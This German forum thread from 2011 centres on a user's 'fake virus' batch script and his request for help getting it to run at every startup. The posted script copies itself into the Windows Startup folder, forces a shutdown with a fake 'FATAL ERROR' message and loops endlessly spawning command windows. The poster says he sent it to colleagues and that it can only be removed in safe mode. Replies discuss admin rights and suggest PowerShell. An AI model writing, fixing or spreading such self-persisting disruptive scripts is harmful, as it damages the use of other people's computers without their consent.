Frage zu Batch Datei

Diskutiere Frage zu Batch Datei im Alles für den Einsteiger Forum im Bereich Computerprobleme; Hallo zusammen. Ich kenne viele "Fake-Virus" mithilfe von Batch-Dateien. Allerdings sind die alle nicht so das wahre. Deshlab hab ich mir überlegt...

  1. #1 Paintloud, 07.09.2011
    Zuletzt bearbeitet: 07.09.2011
    Paintloud

    Paintloud Erfahrener Benutzer

    Dabei seit:
    06.04.2011
    Beiträge:
    187
    Zustimmungen:
    0
    Ort:
    Schweiz
    Hallo zusammen. Ich kenne viele "Fake-Virus" mithilfe von Batch-Dateien. Allerdings sind die alle nicht so das wahre. Deshlab hab ich mir überlegt die Batch-Datei einfach in den Autostart-Ordner kopieren zu lassen, damit sie nach jedem Systemstart automatisch ausgeführt wird. Ich hab also folgende Datei geschrieben:

    @echo off
    copy "KlickMe.bat" "%homedrive%%homepath%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    shutdown -s -t 30 -c "FATAL ERROR"
    :kp
    start
    color 0c
    echo Virus Detected!
    goto kp


    Simpel aber effektiv. Jetzt hab ich aber das Problem, dass die Batch gar nicht beim Systemstart ausgeführt wird, oder zumindest nicht richtig. Wenn ich nämlich das System neu starte sagt er mir in nem cmd Fenster, dass die Datei im System nicht gefunden werden konnte oder so ähnlich. Hab im Pfad nachgeschaut, die Datei befindet sich im Autostart Ordner! Weiss jemand wie man das umgehen kann dass es klappt?

    Danke :)
     
  2. Anzeige

    schau mal hier: Windows-Wartungs-Tool. Viele Probleme lassen sich damit einfach beheben. Oftmals ist der PC dann auch schneller!
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren.
  3. sunday

    sunday Neuer Benutzer

    Dabei seit:
    28.08.2011
    Beiträge:
    4
    Zustimmungen:
    0
    Darf man wissen wen Du damit ärgern möchtest?
     
  4. #3 Paintloud, 07.09.2011
    Paintloud

    Paintloud Erfahrener Benutzer

    Dabei seit:
    06.04.2011
    Beiträge:
    187
    Zustimmungen:
    0
    Ort:
    Schweiz
    Den Staat. Was denkst denn du :D?
    Ein paar Freunde natürlich ^^
     
  5. #4 xandros, 07.09.2011
    xandros

    xandros IT Consultant, Cisco Registered Partner
    Moderator

    Dabei seit:
    05.07.2007
    Beiträge:
    26.162
    Zustimmungen:
    116
    Ort:
    Umkreis Duisburg, neben Mannheim, hinter Hamburg
    Ja! Schau dir das Rechtesystem des Zielbetriebssystemes an. Spaetestens ab Vista wirst du mit dem Skript gegen eine Wand rennen, da das Unterverzeichnis \AppData bereits ein Systemverzeichnis ist, in dem man ohne entsprechende Rechte erst gar nichts ausfuehren darf.

    Nebenbei: Dein Quelltext verursacht einen Fehler! Die Datei kann sich nicht auf sich selbst kopieren!
     
  6. #5 Paintloud, 07.09.2011
    Zuletzt bearbeitet: 07.09.2011
    Paintloud

    Paintloud Erfahrener Benutzer

    Dabei seit:
    06.04.2011
    Beiträge:
    187
    Zustimmungen:
    0
    Ort:
    Schweiz
    Hm ich weiss nicht also ich bei mir hats mal geklappt und ich hab Windows 7 drauf. Musste dann im abgesicherten Modus die Datei aus dem Autostartordner entfernen. Insofern klappt das mit dem kopieren in den Autostart Ordner schon. Habs dann paar Kollegen zum testen geschickt und bei denen hat es nicht geklappt. Du sagst ja, man könne das umgehen sprich beheben.

    Wie denn? Wie muss ich die Batch schreiben dass das so klappt wie ich es eigentlich geplant hab`?
     
  7. #6 xandros, 08.09.2011
    xandros

    xandros IT Consultant, Cisco Registered Partner
    Moderator

    Dabei seit:
    05.07.2007
    Beiträge:
    26.162
    Zustimmungen:
    116
    Ort:
    Umkreis Duisburg, neben Mannheim, hinter Hamburg
    Unter W7? gar nicht. Verwende die Powershell! Darueber gibt es dann auch die entsprechenden Funktionen, die dir die notwendigen Rechte und Signaturen ermoeglichen.
     
  8. #7 Paintloud, 08.09.2011
    Paintloud

    Paintloud Erfahrener Benutzer

    Dabei seit:
    06.04.2011
    Beiträge:
    187
    Zustimmungen:
    0
    Ort:
    Schweiz
    Hab grad gemerkt das meine Kollegen alle kein Win7 hatten. Der Code funktioniert unter Windows 7 einwandfrei. Habs jetzt an 3 verschiedenen PC's mit Win7 getestet und hat überall funktioniert.

    Der Batch kann nur im abgesicherten Modus empfernt werden. Ansonsten stürzt er bei jedem Start ab ;)
    Tut mir leid aber du lagst vollkommen falsch.
     
  9. heinzl

    heinzl .

    Dabei seit:
    29.01.2008
    Beiträge:
    8.376
    Zustimmungen:
    20
    Nein ;)
    Ja logisch bei einem Konto mit Adminrechten.

    Wenn es nicht gerade eine Frickelbude ist, arbeiten User bei keiner Firma mit Adminrechten.
     
  10. #9 Paintloud, 08.09.2011
    Paintloud

    Paintloud Erfahrener Benutzer

    Dabei seit:
    06.04.2011
    Beiträge:
    187
    Zustimmungen:
    0
    Ort:
    Schweiz
    Das ist ja Privatbenutzer und nicht für Firmen gedacht lol
     
  11. Anzeige

    Es ist generell erstmal empfehlenswert alle ggf. veralteten oder fehlerhaften Treiber zu scannen und auf neue zu aktualisieren. Hier kannst du einen Treiber-Scanner downloaden. Das erspart oftmals viel Ärger und hilft gegen diverse Probleme.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren.
  12. #10 helidoc, 09.09.2011
    helidoc

    helidoc killed by a black pudding
    Moderator

    Dabei seit:
    01.06.2007
    Beiträge:
    3.647
    Zustimmungen:
    1
    Ort:
    Bluemchenwiese
    ...auch private Nutzer sollten nicht mit Admin-Rechten arbeiten.
     
  13. #11 Orchidee75, 09.09.2011
    Orchidee75

    Orchidee75 Erfahrener Benutzer

    Dabei seit:
    06.10.2010
    Beiträge:
    892
    Zustimmungen:
    0
    machen die meisten aber dennoch ;)
     
Thema: Frage zu Batch Datei
Besucher kamen mit folgenden Suchen
  1. automatisch batchdatei ausführen win7

    ,
  2. user batch-aw

    ,
  3. batch windows 7 abgesicherter mosud starten

Die Seite wird geladen...

Frage zu Batch Datei - Ähnliche Themen

  1. Desktop Dateien unter Parallels verschwunden

    Desktop Dateien unter Parallels verschwunden: Hallo zusammen, auf meinem Mac läuft Windows mit Parallels (aktuell Version 12). Vor ein paar Wochen habe ich mein Laptop mit HDMI mit meinem...
  2. Frage zu "Erklärvideo"

    Frage zu "Erklärvideo": Hallo, wir würden gerne ein Erklärvideo machen lassen und fragen uns, wie genau das ablaufen würde. Gibt man der Person/der Firma, die das machen...
  3. Hardware Kauf/Tausch Fragen etc...

    Hardware Kauf/Tausch Fragen etc...: Hallo liebe Community, Ich hätte ein paar Fragen bezüglich meines Pc´s. Und zwar möchte ich ein paar Komponenten erneuern und evtl. eine...
  4. Windows 7 verschiebt keine Dateien mit chinesischen Schriftzeichen zwischen Laufwerken

    Windows 7 verschiebt keine Dateien mit chinesischen Schriftzeichen zwischen Laufwerken: Hallo, ich habe ein paar Dateien, die im Titel chinesische Schriftzeichen haben, und ich wollte sie auf einen NAS-Ordner schieben. Ich bekomme...
  5. da-Vinci-Code-Datei????

    da-Vinci-Code-Datei????: Ich weiß nicht ob ich hier richtig bin, sonst bitte verschieben. Seit dem 11.11. stehen komplett alle unsere Fotos auf oben genannter...